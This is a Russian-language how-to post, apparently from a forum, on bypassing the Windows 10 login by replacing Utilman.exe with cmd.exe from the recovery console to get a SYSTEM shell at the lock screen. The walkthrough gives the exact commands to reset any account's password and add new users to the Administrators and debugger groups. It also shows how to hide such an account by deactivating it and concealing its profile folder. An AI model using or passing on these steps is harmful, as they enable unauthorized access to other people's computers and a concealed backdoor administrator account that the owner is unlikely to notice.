Как восстановить пароль, создать новый аккаунт или пользоватся заблокированным Windows
Без USB, без переустановки, без загрузочных дисков и т.д. Оссобености данной уязвимости (а что это ещё?) Windows. (Не знаю сработает ли это не на Windows 10)
Это лишь сброс пароля Windows. Не Биос и тем более не сброс шифровки диска (если её вообще возможно сбросить не потеряв все файлы)
Проверка проходила на Windows 10 version 1909 (Изначально pro, но т.к. пиратка, то обновилась в школьную со всеми функциями pro версии... хз как это возможно)
Сделать такое проще простого, так как безопасность и Windows... вещи мало совместимые. И единственное, что защищает вас это то, что для этого нужно быть непосредственно за компьютером. То есть не вирус, не удалённый доступ здесь не сработают.
КОМАНДЫ РАССЧИТАНЫ НА ОФИЦИАЛЬНУЮ РУССКУЮ ВЕРСИЮ! ИСПОЛЬЗУЯ АНГЛИЙСКУЮ ВЕРСИЮ ИЛИ РУСИФИКАТОР НЕ УДИВЛЯЙТЕСЬ ОШИБКАМ НЕКОТОРЫХ КОМАНД! НАПРИМЕР В АНГЛИЙСКОЙ ВЕРСИИ *administrator*, А НЕ *администратор*!
Сам способ я нашёл на YouTube:
Кратко о том, что находится на видео:
1) Вы включаете компьютер и несколько раз перезагружаете его в момент запуска Windows. (Для этого нужно нажать на специальную кнопку на стационарном ПК или около 5 секунд удерживать кнопку включения на Ноутбуке)
2) Запустится утилита автоматического восстановления. Ждём завершения. Выбираем "дополнительно" - "Поиск и устранение неисправностей" - "Дополнительно" - "Командная строка".
В открывшейся консоли вбиваем:
1)C:
2)cd windows
3)cd system32 (какая папка system в 64-x версии я не знаю)
4)ren Utilman.exe Utilmanorig.exe (название можете сделать любое)
5)copy cmd.exe Utilman.exe
6)Перезагружаем компьютер
3)Нажимаем на кнопку специальных возможностей
4)В открывшейся консоли вбиваем:
net user *имя_пользователя* *пароль*
(Имя пользователя не длинее 20 символов. Если в имени присутствуют пробелы пишем в начале и конце имени "
Например: net user "Admin the king" 1234567890)
Готово!
А теперь к особенностям данной уязвимости.
1) Такое возможно из-за того, что мы открываем консоль от имени Системы. Вбив в консоль taskmgr (Диспетчер задач) в "Подробности" вы сможете увидеть, что любой запущенный вами процесс имеет приписку о том, что он запущен пользователем "SYSTEM".
2) При попытке открыть explorer у вас появится панель Пуск, однако нормальное взаимодействие происходит только со списком открытых приложений. Открыть проводник или меню пуск вы так и не сможете. Среди открытых приложений будет Winlogon.exe, однако он никак не реагирует на попытку закрыть его или "Свернуть все окна".
3)При попытке закрыть процесс входа в систему (winlogon.exe) он откроется заново. При "завершить дерево процессов" через resmon происходит тоже самое.
4) При открытии Steam я смог войти в аккаунт и увидеть свой баланс, однако библиотека, магазин, инвентарь и т.д. просто не загружались. Дополнительные окна (настройки, музыкальный плеер) не открывались. Хотя сама музыка вполне проигрывалась. (Я не проверял Offline-мод и не пытался запустить игры через ярлыки)
P.S. При первом запуске будет английский язык. Просто войдите в аккаунт и перезагрузите Steam.
5) Undertale (пиратка) - работает! Однако, так как сохранения хранятся в папке пользователя... Да и возможность сохранятся я так и не проверил. (Однако, учитывая то, что Steam смог сохранить данные об аккаунте, скорее всего сохранения работают нормально)
6) Открыв notepad и выбрав "Открыть" или "Сохранить как" вы сможете более менее воспользоватся проводником. Файлы надо открывать через правую кнопку мыши.
7)Открытый диспетчер задач (taskmgr) сильно конфликтует с 6 особенностью.
А теперь самая главная особенность данной уязвимости!
Вбив в консоль net user *имя_пользователя* /add вы добавите нового пользователя, который имеет лишь обычные права пользователя. Однако...
net localgroup Пользователь /delete *имя_пользователя*
net localgroup Администратор /add *имя_пользователя*
В моём случае ещё был net localgroup "Debugger users" /add *имя_пользователя*
Полный список подобных групп net localgroup.
Узнать подробности группы net localgroup *название_группы* (если в названии есть пробелы, то надо писать его в ""
Например: net localgroup "Администратор Hyper-V" (и такое там есть...) /add *имя_пользователя*
В случае, если новый аккаунт не отображается после перезагрузки компьютера нужно активировать его net user *имя_пользователя* /active:yes
Чтобы спрятать аккаунт (деативировать его) net user *имя_пользователя* /active:no
Чтобы поставить пароль net user *имя_пользователя* *пароль*
Чтобы удалить аккаунт net user *имя_рользователя* /delete
Если ввести net user *имя_пользователя* * то вам предложат ввести пароль. Это ничего не даёт и скорее всего служит лишь для быстрой проверки пароля.
Подробнее можно узнать вбив net user /help
Список аккаунтов на ПК net user
Подробности аккаунта net user *имя_пользователя*
Если скрыть папку пользователя через "Свойства" и деактивировать (спрятать) аккаунт, то о новом пользователе можно будет узнать только либо через "отображение скрытых папок и файлов" или net user.
Такая уязвимость очень опасна, однако её не исправляют... Я даже не знаю - это лень или реально трудно это исправить? Или возможность открыть консоль в случае заражения ПК вирусом или при проблемах установки Windows действительно настолько важна?